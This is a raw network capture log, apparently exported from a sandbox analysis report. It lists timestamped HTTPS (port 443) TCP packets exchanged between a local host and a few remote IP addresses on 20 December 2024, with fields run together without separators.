                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.789803028 CET44349767141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.791296959 CET49768443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.791327953 CET44349768141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.801875114 CET49780443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.801903009 CET44349780141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.802011013 CET49780443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.802670956 CET49780443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.802685022 CET44349780141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.835377932 CET49767443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.835397005 CET44349767141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.844537020 CET44349738142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.844695091 CET44349738142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.844763041 CET49738443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.882467985 CET49767443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.900896072 CET44349767141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.943650007 CET49767443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.968167067 CET44349770141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.968314886 CET44349770141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.968380928 CET49770443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.968410015 CET44349770141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.968440056 CET44349770141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.968626976 CET44349770141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.968637943 CET49770443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.968676090 CET44349770141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.968884945 CET49770443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.968900919 CET44349770141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.971615076 CET44349773141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.971658945 CET44349772141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.971662998 CET44349773141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.971720934 CET49773443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.971729040 CET44349773141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.971790075 CET44349772141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.971791029 CET44349773141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.971873045 CET49772443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.971879005 CET49773443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.972620010 CET49772443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.972661972 CET44349772141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.973009109 CET49773443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.973023891 CET44349773141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.973273993 CET44349767141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.975285053 CET44349771141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.975425005 CET44349771141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.975486994 CET49771443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.975517035 CET44349771141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.975604057 CET44349771141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.975687027 CET44349771141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.975742102 CET49771443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.975759983 CET44349771141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.975826025 CET49771443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.975837946 CET44349771141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.975918055 CET44349771141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.976279020 CET49771443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.976490974 CET44349770141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.976560116 CET49770443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.977304935 CET44349767141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.977408886 CET44349767141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.977469921 CET49767443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.977488041 CET44349767141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.977560997 CET49767443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.977574110 CET44349767141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.977704048 CET44349767141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.977758884 CET49767443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.978317976 CET49738443192.168.2.4142.250.181.132
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.978343010 CET44349738142.250.181.132192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.978794098 CET49770443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.978807926 CET44349770141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.979518890 CET49767443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.979543924 CET44349767141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.988316059 CET49771443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.988332987 CET44349771141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.995452881 CET49781443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.995491028 CET44349781141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.995560884 CET49781443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.995812893 CET49781443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.995827913 CET44349781141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.997540951 CET49782443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.997558117 CET44349782141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.997889042 CET49782443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.998090029 CET49782443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:46.998101950 CET44349782141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.020374060 CET49783443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.020426989 CET44349783141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.020636082 CET49783443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.021434069 CET49784443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.021442890 CET44349784141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.021498919 CET49784443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.024010897 CET49785443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.024022102 CET44349785141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.024252892 CET49785443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.025341034 CET49786443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.025347948 CET44349786141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.025445938 CET49786443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.028965950 CET49787443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.028984070 CET44349787141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.029148102 CET49787443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.031441927 CET49788443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.031495094 CET44349788141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.031557083 CET49788443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.049360037 CET49783443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.049402952 CET44349783141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.049565077 CET49784443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.049576998 CET44349784141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.050496101 CET49785443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.050522089 CET44349785141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.051337957 CET49786443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.051352024 CET44349786141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.052675009 CET49787443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.052699089 CET44349787141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.056073904 CET49788443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.056106091 CET44349788141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.307568073 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.307611942 CET49792443192.168.2.4104.26.3.122
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.307704926 CET44349792104.26.3.122192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.307777882 CET49792443192.168.2.4104.26.3.122
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.308393955 CET49792443192.168.2.4104.26.3.122
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.308427095 CET44349792104.26.3.122192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.308509111 CET49779443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.308525085 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.309446096 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.309500933 CET49779443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.309966087 CET49779443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.310029984 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.310091972 CET49779443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.351355076 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.365808964 CET49779443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.365814924 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.412405014 CET49779443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.756901979 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.756939888 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.756963968 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.756987095 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.757015944 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.757019043 CET49779443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.757091045 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.757148027 CET49779443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.757148027 CET49779443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.757172108 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.765264034 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.765312910 CET49779443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.765333891 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.773682117 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.773804903 CET49779443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.773825884 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.825853109 CET49779443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.949158907 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.953053951 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.953198910 CET49779443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.953207016 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.953221083 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.953290939 CET49779443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.960954905 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.972079992 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.972224951 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.972291946 CET49779443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.972311020 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.974284887 CET49779443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.979851961 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.987751007 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.987811089 CET49779443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.987812042 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.987826109 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.987880945 CET49779443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.995696068 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.003753901 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.003809929 CET49779443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.003832102 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.012005091 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.012069941 CET49779443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.012098074 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.019746065 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.019804955 CET49779443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.019819975 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.027682066 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.027755022 CET49779443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.027771950 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.028671026 CET44349780141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.028985023 CET49780443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.028997898 CET44349780141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.030090094 CET44349780141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.030554056 CET49780443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.030726910 CET44349780141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.030730009 CET49780443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.067925930 CET49779443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.067946911 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.068892002 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.068934917 CET49779443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.068948030 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.071352005 CET44349780141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.084006071 CET49780443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.115207911 CET49779443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.140917063 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.143610001 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.143666029 CET49779443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.143688917 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.148538113 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.148626089 CET49779443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.148643017 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.153610945 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.153696060 CET49779443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.153709888 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.163362026 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.163410902 CET49779443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.163429022 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.163508892 CET49779443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.172719955 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.172727108 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.172777891 CET49779443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.172796011 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.172836065 CET49779443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.182130098 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.182137012 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.182187080 CET49779443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.191306114 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.191325903 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.191355944 CET49779443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.191384077 CET49779443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.196279049 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.196333885 CET49779443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.204127073 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.204183102 CET49779443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.207566023 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.207649946 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.207705021 CET49779443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.208163977 CET49779443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.208185911 CET44349779141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.258560896 CET44349781141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.258955002 CET49781443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.258984089 CET44349781141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.260201931 CET44349781141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.260528088 CET49781443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.260641098 CET49781443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.260646105 CET44349781141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.260705948 CET44349781141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.261141062 CET44349782141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.261276007 CET44349785141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.261343956 CET49782443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.261353016 CET44349782141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.261450052 CET49785443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.261459112 CET44349785141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.262510061 CET44349785141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.262567997 CET49785443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.262871027 CET49785443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.262933969 CET44349785141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.262989998 CET49785443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.264911890 CET44349782141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.265010118 CET49782443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.265393019 CET49782443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.265523911 CET44349782141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.265537024 CET49782443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.277734041 CET44349787141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.277909040 CET49787443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.277920961 CET44349787141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.279587984 CET44349787141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.279643059 CET49787443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.279918909 CET49787443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.280025005 CET49787443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.280029058 CET44349787141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.280049086 CET44349787141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.283540964 CET44349784141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.283813000 CET49784443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.283819914 CET44349784141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.284312010 CET44349786141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:48.284374952 CET44349783141.193.213.10192.168.2.4
